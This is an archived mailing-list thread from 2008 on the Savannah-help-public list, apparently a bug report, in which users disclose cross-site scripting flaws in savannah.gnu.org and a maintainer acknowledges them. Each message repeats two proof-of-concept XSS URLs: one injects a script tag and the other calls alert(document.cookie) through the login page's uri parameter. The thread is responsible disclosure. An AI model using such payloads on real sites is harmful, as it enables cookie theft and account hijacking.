Re: [Savannah-help-public] security bug and propose to join

2008-01-05 Thread Sylvain Beucler
Hi, On Sat, Jan 05, 2008 at 12:17:32PM +0100, Emanuele Gentili wrote: > Hello people. > > I was found some security bug in savannah.gnu.org. > > http://savannah.gnu.org/cookbook/?func=detailitem&comingfrom=23&item_id=%22%3E%3Cscript%3Ealert(420)%3C/script%3E > https://savannah.gnu.org/account/lo

Re: [Savannah-help-public] XSS on Savannah!

2008-01-05 Thread Sylvain Beucler
On Sat, Jan 05, 2008 at 11:18:38AM +, Matt Lee wrote: > http://savannah.gnu.org/cookbook/?func=detailitem&comingfrom=23&item_id=%22%3E%3Cscript%3Ealert(420 > > https://savannah.gnu.org/account/login.php?uri=";>alert(document.cookie) Thanks for the report. -- Sylvain

[Savannah-help-public] XSS on Savannah!

2008-01-05 Thread Matt Lee
http://savannah.gnu.org/cookbook/?func=detailitem&comingfrom=23&item_id=%22%3E%3Cscript%3Ealert(420 https://savannah.gnu.org/account/login.php?uri=";>alert(document.cookie) -- Matt Lee - http://www.gnu.org/people/mattl/ Campaigns Manager Free Software Foundation signature.asc Description: Ope

[Savannah-help-public] security bug and propose to join

2008-01-05 Thread Emanuele Gentili
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello people. I was found some security bug in savannah.gnu.org. http://savannah.gnu.org/cookbook/?func=detailitem&comingfrom=23&item_id=%22%3E%3Cscript%3Ealert(420)%3C/script%3E https://savannah.gnu.org/account/login.php?uri=";>alert(document.cookie